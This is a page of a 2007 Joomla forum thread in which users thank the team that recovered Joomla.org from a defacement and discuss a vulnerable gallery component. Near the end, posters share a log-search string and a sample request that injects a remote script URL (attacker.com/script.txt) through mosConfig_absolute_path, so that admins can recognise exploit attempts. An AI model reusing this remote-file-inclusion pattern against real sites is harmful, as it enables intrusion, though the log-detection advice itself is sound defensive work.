Joomla! Discussion Forums



It is currently Sun Nov 22, 2009 2:53 am (All times are UTC )

 





Post new topic Reply to topic  [ 53 posts ]  Go to page Previous  1, 2
Author Message
Posted: Sun Aug 19, 2007 2:44 pm 
User avatar
Joomla! Master
Joomla! Master
Offline

Joined: Thu Aug 18, 2005 7:13 am
Posts: 13234
Hadn't noticed that, fine with me as well.

_________________
Antonie de Wilde - Forum admin
All Joomla! release dates and days between releases: http://jfoobar.org/blog/189-days-betwee ... a-releases.test


Top
   
 
Posted: Sun Aug 19, 2007 3:17 pm 
User avatar
Joomla! Champion
Joomla! Champion
Offline

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 5759
Location: New York
Thank you so much to everyone who got the sites back up--I know you are all exhausted .... sleep, get some fresh air, enjoy the day.

_________________
Read your words before posting and think about how other people will read them.
Be polite. Be kind. Be constructive. Say thank you.
Freedom-Equality-Trust-Community-Collaboration-Usability
http://opensourcematters.org/index.php?Itemid=134


Top
   
 
Posted: Sun Aug 19, 2007 3:20 pm 
User avatar
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Sat Aug 18, 2007 4:07 pm
Posts: 3
Location: Oregon
Thanks for the official posting!  It's good to know the core is still secure.  My site has been following this issue as well since it began as we run many Joomla sites.  Again, thanks for the response and fast work on resolving the issue.

_________________
CoffeeDaze - The Caffeinated Community


Top
  E-mail  
 
Posted: Sun Aug 19, 2007 6:16 pm 
User avatar
Joomla! Champion
Joomla! Champion
Offline

Joined: Wed Nov 22, 2006 3:35 pm
Posts: 6420
Location: Nebraska
Louis -

I do appreciate all that you and Rob and the others have done to diagnose and resolve this problem. I respect the transparency in which you described Joomla! org's mistakes and the maturity that comes from accepting responsibility. I am so relieved that this turned out to be a vulnerability within a component not distributed to others. Your commitment and willingness to keep working, in spite of the fact you must have been exhausted, is admired.

But, why, Louis, why cast dispersions on Omaha, Nebraska?

Amy :)

_________________
http://Twitter.com/AmyStephen
Unofficial Joomla Developer and Site Builders Network http://AllTogetherAsAWhole.org


Top
   
 
Posted: Sun Aug 19, 2007 7:37 pm 
User avatar
Joomla! Champion
Joomla! Champion
Offline

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 5759
Location: New York
You didn't know you had celebrities in town, did you? They were avoiding the papparazzi,  :)

_________________
Read your words before posting and think about how other people will read them.
Be polite. Be kind. Be constructive. Say thank you.
Freedom-Equality-Trust-Community-Collaboration-Usability
http://opensourcematters.org/index.php?Itemid=134


Top
   
 
Posted: Sun Aug 19, 2007 7:45 pm 
User avatar
Joomla! Hero
Joomla! Hero
Offline

Joined: Thu Aug 18, 2005 11:10 am
Posts: 2135
Location: Floripa, Brazil
great work guys!

let's see the good sides of this situation:
- it wasn't a bug in the joomla's core. ( \o/ )
- we've seen how important it is to turn off register_globals emulation.
- no one else uses the buggy component (or not :D)
- there are many people active in the forums during the weekend :D

lessons learned, now let's get back to our regular lives.

_________________
Matheus Teixeira Mendes
http://www.bigodines.com/blog || http://www.joomla.com.br/


Top
  E-mail  
 
Posted: Sun Aug 19, 2007 9:27 pm 
User avatar
Joomla! Guru
Joomla! Guru
Offline

Joined: Tue Jul 18, 2006 3:55 pm
Posts: 845
Quote:
Again, thank you all for your patience and understanding.


No - thank you, Louis for a very impressive post after a mistake. It was direct, honest and very reassuring.

_________________
The web's best Joomla! SEO resources: http://Alledia.com
Joomla Training in the USA: http://JoomlaTraining.com


Top
  E-mail  
 
Posted: Mon Aug 20, 2007 2:05 am 
User avatar
Joomla! Guru
Joomla! Guru
Offline

Joined: Sun Nov 26, 2006 10:46 pm
Posts: 598
Location: New York
Excellent work gents... get some rest.. you more than deserve it.

_________________
If you're not a part of the solution, you're a part of the problem.


Top
  E-mail  
 
Posted: Mon Aug 20, 2007 2:17 am 
User avatar
Joomla! Guru
Joomla! Guru
Offline

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Top
  E-mail  
 
Posted: Mon Aug 20, 2007 11:49 am 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Sep 12, 2005 7:41 pm
Posts: 1374
Location: Glasgow - Scotland
I for one am not concerned that Joomla.org got hacked - hackers will find ways of hacking almost anything :)

The best thing to have come out of all of this is yet another crystal clear indication of the hard work that guys like Louis and Rob put into Joomla to ensure the highest possible levels of security for the Joomla core and the Joomla.org sites - knowing that these guys are not clock-watchers and are willing to make themselves available for the greater good of the community at any time of night or day certainly fills me with confidence.

Waseem raises a glass to Louis, Rob and the rest of the team that have worked their pants off all weekend to rectify the hacker's attempt to deface Joomla.org

_________________
http://www.bulletprooftemplates.com/ - New Joomla 1.5 templates from an old Joomla head
If you don't know the answer don't be afraid to ask someone who does


Top
  E-mail  
 
Posted: Mon Aug 20, 2007 12:02 pm 
Joomla! Guru
Joomla! Guru
Offline

Joined: Thu Aug 18, 2005 9:10 pm
Posts: 682
Location: Hey! I'm in Hartlepool! We hang monkeys!!!
Quote:
I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.

I'll lend them mine. Also includes rotisserie.
:laugh:

_________________
When all of your wishes are granted, many of your dreams will be destroyed...


Top
  E-mail  
 
Posted: Mon Aug 20, 2007 1:52 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Sun Aug 28, 2005 11:20 pm
Posts: 28
Location: Toronto, Ontario, Canada
Agreed. Thank you all for your very hard work on this.

Cheers
Chris Hutcheson


Top
  E-mail  
 
Posted: Tue Aug 21, 2007 8:22 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Wed Sep 14, 2005 5:59 am
Posts: 113
Hello: I found a lot of extrange links trying to hack my site the last weekend. First I closed all, then I did a serching for a site name and wrote to the ISP provider into theirs website where was the script.
Unfortunally I received this part of email:
"we will not be able to resolve this issue by e-mail"
"Our Customer Service Specialists will investigate your inquiry and send you a response
within 1 business day."
1 business day, is a paradise for intruders.

So, nobody will be safe on the weekends. The server providers hasn't technical personal.

I'm sorry, for your bad day.
Bye
 


Top
  E-mail  
 
Posted: Tue Aug 21, 2007 4:01 pm 
User avatar
Joomla! Intern
Joomla! Intern
Offline

Joined: Wed Nov 01, 2006 6:20 pm
Posts: 59
I hope you have had time to recuperate! Great work as always. Hard to have staff 24/7/365 when you are an Open Source Community.
Hope you are not too exhausted to continue polishing 1.5... :)

You're the best!


Top
  E-mail  
 
Posted: Tue Aug 21, 2007 8:34 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Tue Jul 04, 2006 12:59 am
Posts: 12
It looks like the issue is with expose picture gallery.  See the discussion here: http://www.gotgtek.com/forum/index.php?topic=1315.0

our site: http://bcProject.info has expose installed and it the hackers defaced our site using a vulnerability within expose.  There's a script in the component allowing for the uploading of background images.  It was exploited to allow an attacker to upload files to the site.

Hope that resolves the mystery of "why other sites were hacked the same day".

cheers...


Top
  E-mail  
 
Posted: Tue Aug 21, 2007 8:48 pm 
User avatar
Joomla! Champion
Joomla! Champion
Offline

Joined: Wed Nov 22, 2006 3:35 pm
Posts: 6420
Location: Nebraska
Buffnerd -

Please post this type of information in the Security Section. In the link you provided, someone is linking to JoomlaCode for the current version. So, maybe those who have not upgraded are vulnerable. But, it needs to be shared in the Security forum so that it can be reviewed.

I do not believe there have been many reports of sites cracked. But, reporting the specifics is helpful in the security forum. Many people have enabled "notify" on that forum to receive all security reports. Also, if there really is a "mass attack" the Joomla! forum can collect good information to share with the rest of the community. This is even more important if a specific third party extension is suspected - there are places that type of information is recorded so that others can receive such information immediately and so a historical record is maintained.

Thanks!
Amy

_________________
http://Twitter.com/AmyStephen
Unofficial Joomla Developer and Site Builders Network http://AllTogetherAsAWhole.org


Top
   
 
Posted: Tue Aug 21, 2007 9:42 pm 
User avatar
Joomla! Guru
Joomla! Guru
Online

Joined: Thu Aug 18, 2005 1:27 pm
Posts: 548
Location: Washington, DC
From my vantage here, I want to thank Rob for responding to my text message so early in the morning and then the rest of the core for rocking and rolling for the next 24 hours.  Amazing work folks.  Hats off to everyone that contributed their precious weekends with families to the Joomla! community.

Best,
Ryan

_________________
PICnet - "Empowering the missions of non-profits through technology"
www.picnet.net


Top
   
 
Posted: Tue Aug 21, 2007 10:19 pm 
User avatar
Joomla! Intern
Joomla! Intern
Offline

Joined: Thu Dec 29, 2005 7:15 pm
Posts: 65
First of all, will some kids end up in a Turkish Jail because they had a bit of fun with some sloppy site management? It happens. Get over it  and no Turkish police, thank you. Some Midnight Express, anyone?

Secondly, wakie wakie, eggs and bakie.  :pop

_________________
What if then else?


Top
  E-mail  
 
Posted: Thu Aug 23, 2007 4:54 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Thu Jun 21, 2007 9:36 pm
Posts: 36
Location: Oklahoma
Interesting, I'm glad this was a problem with a non-publicly released component. I'm really really new to Joomla, but I am a info security student who is also just now getting into web development. Just chance that I found Joomla (which btw is THE best!) and choose it for learning more about web dev,php and mysql.

I have read the security warnings (forum/FAQ) for Joomla and have taken these steps on my 2 dev. projects, BUT that really only goes so far. New people, myself included, can read till their eyes bulge from too much coffee and eye strain... but if they they don't "know" how to recognize attack attempts, be it mysql injection or strange request.... how are we to know besides the infamous

((This site has been defaced by some camel humping idiot)) "sorry camels"

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.

I know it's largely a apache/mysql subject, but I think allot of these attacks could be prevented with a little more Joomla specific education.

I'd imagine most Joomla users wouldn't know where to start, or what to check for regularly (I get lost). I think this would make serious users more aware and would in the long run help you all (dev team).

Just a suggestion, feasible?


Top
  E-mail  
 
Posted: Fri Aug 24, 2007 3:15 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Tue Nov 22, 2005 5:39 pm
Posts: 382
Location: Calcutta - India
Solitary_God wrote:

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.



For a start, You can search the logs for the text
Code:
index.php?mosConfig_absolute_path=
as Rob mentions here

_________________
Romit Chatterjee
× Joomla! Web Developer - http://www.RomitChat.com
× IndicJoomla! Translation Coordinator - http://www.JoomlaIndia.org/bengali/


Top
  E-mail  
 
Posted: Fri Aug 24, 2007 6:16 pm 
Joomla! Guru
Joomla! Guru
Offline

Joined: Fri Dec 29, 2006 11:57 pm
Posts: 630
Thanks a lot gus for the good job.

I've one addition to this
romit wrote:
Solitary_God wrote:

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.



For a start, You can search the logs for the text
Code:
index.php?mosConfig_absolute_path=
as Rob mentions here


the request maybe accompanied by a 403 error message. For example the logs of the server may show the following:
Code:
[date/time] "GET index.php?mosConfig_absolute_path==http://www.attacker.com/script.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.807" 101.131.131.101 - -


of course, parameters differs according to the websites path + attacker's script

_________________
Me = Wonder + Ponder
http://www.hichamaged.net/


Last edited by HH on Fri Aug 24, 2007 6:17 pm, edited 1 time in total.

Top
   
 
Posted: Fri Aug 24, 2007 7:11 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Thu Jun 21, 2007 9:36 pm
Posts: 36
Location: Oklahoma
Ok, I can understand that. I'm a day or 2 from releasing a development project which I myself will be hosting, so I want to get a good understanding of how to reconize exploit attempts outside of firewall logs. Good to know what to look for in logs. Thanks again for your time!


Top
  E-mail  
 
Posted: Fri Aug 24, 2007 7:45 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
Joomla! 1.0.11+ have come with some mod_rewrite rules at the end of the htaccess.txt file that examine URLs for known exploit attempts.  I would recommend having a look at those rules for some ideas on what to look for in log files.  Also, use the script.  That is what is causing the 403 error that HH described.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Top
  E-mail  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 53 posts ]  Go to page Previous  1, 2

Quick reply

 



Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group